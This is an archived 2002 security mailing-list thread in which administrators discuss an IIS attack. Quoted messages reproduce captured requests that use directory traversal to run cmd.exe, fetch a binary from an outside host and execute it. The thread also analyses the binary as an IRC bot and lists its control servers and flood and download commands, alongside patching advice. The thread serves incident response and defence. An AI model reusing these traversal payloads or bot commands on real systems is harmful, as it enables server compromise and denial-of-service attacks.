|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Dallas Jordan (DJordan_at_sawgrassink.com)
Date: Tue Sep 24 2002 - 16:20:19 CDT
The Microsoft Baseline security analyzer is good for telling you what
patches a computer needs and where to get them.
-----Original Message-----
From: zeno [mailto:bugtraq
cgisecurity.net]
Sent: Tuesday, September 24, 2002 2:29 PM
To: MarkCmtbaker.wednet.edu
Cc: pjesec.dk; incidentssecurityfocus.com
Subject: Re: new IIS worm? (rcp lsass.exe)
>
> Hardening of IIS with the tools available at Microsoft and using URLSCAN
> with the EXE blocking on will stop these attacks.
>
> Patch, patch, patch, recheck the patches and use URLSCAN!
Does anyone know of a gui windows tool that scans your system and provides
you with a list
of needed patches, and then allows you to select, and have it autodownload
and install them?
I can't seem to find one (needed mostly for iis).
- zenocgisecurity.com
>
> Mark Challender
> Network Administrator
>
> ==================
> Veni, Vidi, Geeki
> ==================
>
>
> -----Original Message-----
> From: pjesec.dk [mailto:pjesec.dk]
> Sent: Monday, September 23, 2002 3:27 AM
> To: incidentssecurityfocus.com
> Subject: Re: new IIS worm? (rcp lsass.exe)
>
>
>
> Christian Mock:
>
> >Then it seems to go after the web servers, sending the following:
>
> >GET
>
/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+rcp+-b+64.21.95.7.lp:lsass.exe+
> .
> HTTP/1.0..
>
> >and
>
> >GET /scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+lsass.exe HTTP/1.0
>
> >I've been able to get hold of that lsass.exe binary (9728 bytes), but
> >I lack the skills to analyze it; I'll happily mail it to anybody who
asks.
>
>
> We have seen this attack from 4 different sources since Sept. 16, and have
> informed the owner of 64.21.95.7 and downloaded the lsass.exe for
> investigation.
>
> Based on the attack rate this is most likely a scripted or manual attack,
> not a worm.
>
> Judging from the embedded string in this compressed binary it appears to
> be an IRC bot based on the kaiten.c code written by contemefnet, the
> author of the Slapper worm :
>
> Kaiten Win32 API version 2002 by contemefnet
>
> The binary contains these domainnames, most likeky IRC servers used for
> controlling the bot:
>
> telsa5.mine.nu (Korea)
> irc.logicfive.net (Taiwan)
> moncredo.shacknet.nu (USA)
> telsacredo.shacknet.nu (USA)
> lar.ath.cx (Taiwan)
>
> The program accepts commands to make various DOS attacks or download new
> version or executables with http:
>
> NOTICE %s :PUSH <target> <port> <secs> = A push flooder
> NOTICE %s :TCP <target> <port> <secs> = A syn flooder
> NOTICE %s :UDP <target> <port> <secs> = A udp flooder
> NOTICE %s :MCON <target> <port> <times> = A connectbomb flooder
> NOTICE %s :NICK <nick> = Changes the nick of the client
> NOTICE %s :DISABLE <pass> = Disables all packeting from
this
> client
> NOTICE %s :ENABLE <pass> = Enables all packeting from this
> client
> NOTICE %s :UPDATE <http address> = Downloads a file off the web
and
> updates the client
> NOTICE %s :RUN <http address> = Downloads a file off the web
and
> runs it
> NOTICE %s :GET <http address> = Downloads a file off the web
> NOTICE %s :ADDSERVER <server> = Adds a server to the list
> NOTICE %s :DELSERVER <server> = Deletes a server from the list
> NOTICE %s :LISTSERVERS = Lists server on the list
> NOTICE %s :KILL = Kills the client
> NOTICE %s :VERSION = Requests version of client
> NOTICE %s :HELP = Displays this
>
>
> There seems also to be a default account and password in the german
> language included in this specific version of Kaiten.
>
> The IIS attack that tries to inject this Trojan usually has another URL
> with "CONNECT chat.vtm.be:6667". This is an attempt to proxy an
connection
> to port 6667(IRC) on chat.vtm.be.
>
>
>
> Peter Jelver
> ...
>
> eSec A/S
>
> http://www.esec.dk
>
............................................................................
> .
>
> PGP Fingerprint : 47AF FFEC D48F 9C13 0C4F E687 BB8A 128F D85C A7D7
>
>
>
>
>
>
----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>
----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]